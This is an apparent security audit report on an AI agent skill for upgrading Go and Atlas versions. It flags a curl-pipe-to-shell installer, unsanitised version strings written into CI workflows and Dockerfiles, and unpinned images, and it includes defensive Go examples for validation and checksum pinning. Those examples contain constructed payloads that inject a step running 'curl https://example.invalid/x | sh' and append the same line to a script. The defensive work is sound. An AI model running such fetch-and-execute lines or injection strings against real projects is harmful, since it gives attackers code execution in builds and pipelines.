upgrading-golang

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: CRITICAL
Findings: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
  • REMOTE_CODE_EXECUTION (CRITICAL): The skill implements a 'curl | sh' pattern to download and execute scripts directly from the internet.
  • Evidence: Step 7c in SKILL.md uses curl -sSf https://atlasgo.sh | ... sh -s -- -y to install the Atlas CLI.
  • Source Status: The domain atlasgo.sh is not a trusted source according to the [TRUST-SCOPE-RULE].
  • Risk: Whatever https://atlasgo.sh serves at the moment of the request runs with the runner's privileges. Nothing pins a release, checks a checksum, or verifies a signature, so a compromised domain, DNS, or CDN, or a server that serves different content to a piped request than to a browser, yields code execution on every machine that runs the skill.
  • PROMPT_INJECTION / INDIRECT POISONING (HIGH): The skill lacks sanitization for user-provided version strings which are then used to modify high-privilege configuration files.
  • Ingestion points: User-provided Go version (Step 1) and Atlas version (Step 1).
  • Boundary markers: None. Input is directly interpolated into patterns.
  • Capability inventory: Write access to go.mod, multiple Dockerfiles, and GitHub Action workflows (lint.yml, test.yml, release.yaml, codeql.yml); execution of make, go, and docker.
  • Sanitization: None. The skill assumes the user provides a valid version string.
  • Risk: A malicious version string (e.g., one containing a newline or shell metacharacters) becomes part of a YAML workflow step, a Dockerfile RUN line, or a go.mod directive as written, so it can add a CI/CD job step, a build-time command, or an unexpected toolchain to the project.
  • EXTERNAL_DOWNLOADS (MEDIUM): The skill downloads Docker images and binaries from non-whitelisted third-party registries.
  • Evidence: docker pull arigaio/atlas:X.XX.X and curl https://atlasgo.sh.
  • Context: While arigaio is the official Atlas maintainer, it is not within the predefined trusted organization list, making these unverifiable dependencies in this security context. The image is also referenced by a mutable tag (arigaio/atlas:X.XX.X) rather than an immutable @sha256 digest, so the pulled contents can change without the version string changing.
  • COMMAND_EXECUTION (MEDIUM): The skill executes multiple shell commands with side effects on the local filesystem.
  • Evidence: make test, make lint, go mod tidy, wire ./..., and buf format -w in Steps 8 and 9.
  • Risk: Because these commands run after the skill has modified project files based on user input, they could trigger malicious logic if the modifications included injection payloads.
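The injection path described in the PROMPT_INJECTION finding, as an added illustration that is not code from the audited skill or from this report: a Go program that renders a setup-go workflow step the way the skill interpolates a raw version string, shows a constructed newline payload adding a second step, and beside it an anchored allow-list validator that rejects the same input before anything is rendered. The regular expressions, the workflow template, the function names and the payload are assumptions made for this example.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// Strict allow-lists for the two version strings the skill ingests:
// a Go toolchain version as written in go.mod ("1.22" or "1.22.3") and
// an Atlas release tag ("0.30.0", optionally with a leading "v").
// These patterns are assumptions for this example, not the skill's own rules.
var (
	goVersionRe    = regexp.MustCompile(`^[1-9][0-9]*\.[0-9]+(\.[0-9]+)?$`)
	atlasVersionRe = regexp.MustCompile(`^v?[0-9]+\.[0-9]+\.[0-9]+$`)
)

var ErrBadVersion = errors.New("version string rejected")

// ValidateGoVersion returns the version unchanged if it matches the
// allow-list and an error otherwise. The pattern is anchored and its
// character classes exclude whitespace, quotes, ';', '|', '$' and
// backticks, so a newline or shell metacharacter can never pass.
func ValidateGoVersion(v string) (string, error) {
	if !goVersionRe.MatchString(v) {
		return "", fmt.Errorf("%w: %q", ErrBadVersion, v)
	}
	return v, nil
}

// ValidateAtlasVersion applies the same idea and normalises away a leading "v".
func ValidateAtlasVersion(v string) (string, error) {
	if !atlasVersionRe.MatchString(v) {
		return "", fmt.Errorf("%w: %q", ErrBadVersion, v)
	}
	return strings.TrimPrefix(v, "v"), nil
}

// workflowTemplate stands in for the setup-go step of lint.yml / test.yml.
const workflowTemplate = `      - uses: actions/setup-go@v5
        with:
          go-version: %s
`

// RenderUnsafe interpolates the raw string, as the audited skill does.
func RenderUnsafe(goVersion string) string {
	return fmt.Sprintf(workflowTemplate, goVersion)
}

// RenderSafe validates first and refuses to render anything otherwise.
func RenderSafe(goVersion string) (string, error) {
	v, err := ValidateGoVersion(goVersion)
	if err != nil {
		return "", err
	}
	return fmt.Sprintf(workflowTemplate, v), nil
}

// StepCount counts YAML list items at step indentation ("      - ") so
// the effect of an injected payload can be observed as an extra step.
func StepCount(yaml string) int {
	n := 0
	for _, line := range strings.Split(yaml, "\n") {
		if strings.HasPrefix(line, "      - ") {
			n++
		}
	}
	return n
}

func main() {
	// Constructed payload: a valid-looking version followed by a newline
	// and a second workflow step that runs an attacker-chosen command.
	payload := "1.22.3\n      - run: curl -sSf https://example.invalid/x | sh"
	fmt.Printf("unsafe render has %d steps\n", StepCount(RenderUnsafe(payload)))
	if _, err := RenderSafe(payload); err != nil {
		fmt.Println("safe render:", err)
	}
	v, _ := ValidateAtlasVersion("v0.30.0")
	fmt.Println("atlas tag normalised to", v)
}
```

The validator deliberately allow-lists rather than strips: a version string that needs any character outside `[0-9.v]` is wrong input, and rejecting it loudly is safer than trying to repair it before it reaches a workflow file or a Dockerfile.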
Recommendations
  • AI detected serious security threats; do not run the skill as published.
  • Replace the curl | sh install with a download to disk, verification against a checksum or signature obtained out of band, and only then execution.
  • Validate the Go and Atlas version strings against a strict, anchored pattern before they are interpolated into go.mod, the Dockerfiles, or the workflow files; reject anything containing whitespace, quotes, or shell metacharacters.
  • Pin the arigaio/atlas image by @sha256 digest rather than by tag.
  • Run make, go, docker, wire, and buf only after the modified files have been reviewed.
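A pinned alternative to the curl | sh install from the REMOTE_CODE_EXECUTION finding, and to the tag-based docker pull from the EXTERNAL_DOWNLOADS finding, as an added example that is not code from the audited skill, from Atlas, or from this report: the downloaded script is compared in constant time against a SHA-256 digest pinned ahead of time, is written to disk only after it matches, and an image reference is built by digest rather than by tag. The constructed script bytes, the helper names and the placeholder digests are assumptions; a real pin must be copied from a checksum the maintainers publish out of band, not fetched from atlasgo.sh alongside the script.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"encoding/hex"
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

var (
	ErrDigestFormat   = errors.New("pinned digest must be 64 lowercase hex characters")
	ErrDigestMismatch = errors.New("installer digest does not match pinned value")
)

// hex64 accepts exactly one encoding of a SHA-256 digest (lowercase hex),
// so a truncated or hand-edited pin is rejected before any comparison.
var hex64 = regexp.MustCompile(`^[0-9a-f]{64}$`)

// VerifyInstaller computes SHA-256 over the downloaded script and compares
// it in constant time with a digest the operator pinned ahead of time.
func VerifyInstaller(script []byte, pinnedHex string) error {
	if !hex64.MatchString(pinnedHex) {
		return ErrDigestFormat
	}
	want, _ := hex.DecodeString(pinnedHex) // cannot fail after the regexp check
	got := sha256.Sum256(script)
	if subtle.ConstantTimeCompare(got[:], want) != 1 {
		return fmt.Errorf("%w: got %s", ErrDigestMismatch, hex.EncodeToString(got[:]))
	}
	return nil
}

// StageInstaller writes the script into dir only after it verified, so the
// execute step can only ever see bytes that matched the pin. Handing the
// returned path to sh is left to the caller so the example runs offline.
func StageInstaller(dir string, script []byte, pinnedHex string) (string, error) {
	if err := VerifyInstaller(script, pinnedHex); err != nil {
		return "", err
	}
	path := filepath.Join(dir, "install-atlas.sh")
	if err := os.WriteFile(path, script, 0o700); err != nil {
		return "", err
	}
	return path, nil
}

// PinnedImageRef builds a digest-pinned reference (repo@sha256:...) so that
// docker pull fetches exactly one reviewed image instead of whatever a
// mutable tag currently points to.
func PinnedImageRef(repo, digestHex string) (string, error) {
	if !hex64.MatchString(digestHex) {
		return "", ErrDigestFormat
	}
	return repo + "@sha256:" + digestHex, nil
}

func main() {
	// Constructed stand-in for the script that https://atlasgo.sh would serve.
	script := []byte("#!/bin/sh\necho 'installing atlas'\n")
	// In real use the pin is copied from the maintainers' published checksum;
	// here it is derived from the constructed script so the example is self-contained.
	sum := sha256.Sum256(script)
	pin := hex.EncodeToString(sum[:])

	dir, err := os.MkdirTemp("", "atlas-install")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)

	path, err := StageInstaller(dir, script, pin)
	fmt.Println("staged:", path, err)

	// A single appended line is enough to change the digest and block staging.
	tampered := append(append([]byte{}, script...), []byte("curl -s https://example.invalid/x | sh\n")...)
	_, err = StageInstaller(dir, tampered, pin)
	fmt.Println("tampered:", err)

	// Placeholder image digest (not a real arigaio/atlas digest).
	ref, _ := PinnedImageRef("arigaio/atlas", strings.Repeat("ab", 32))
	fmt.Println("docker pull", ref)
}
```

The ordering is the point: verify, then write, then (outside this example) execute. A pipeline that executes first and checks afterwards, or that reads the expected checksum from the same origin it just fetched the script from, provides no integrity guarantee against a compromised origin.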
Audit Metadata
Risk Level: CRITICAL
Analyzed: Feb 16, 2026, 06:19 AM